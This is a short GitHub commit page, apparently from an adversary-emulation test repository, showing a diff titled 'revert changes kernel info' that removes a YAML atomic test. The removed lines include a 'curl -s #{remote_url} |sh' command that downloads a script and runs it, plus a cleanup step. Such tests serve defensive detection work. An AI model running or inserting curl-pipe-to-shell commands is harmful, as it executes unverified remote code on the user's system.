revert changes kernel info (#2598)

This commit is contained in:
Carrie Roberts
2023-11-08 22:59:50 -05:00
committed by GitHub
parent 08a8183910
commit 8fa4b4cbeb
-7
View File
@@ -323,11 +323,4 @@ atomic_tests:
name: sh
elevation_required: false
command: |
cd /tmp
curl -s #{remote_url}
ls -la /tmp/art.txt
curl -s #{remote_url} |sh
ls -la /tmp/art.txt
cleanup_command: |
rm /tmp/art.txt
uname -srm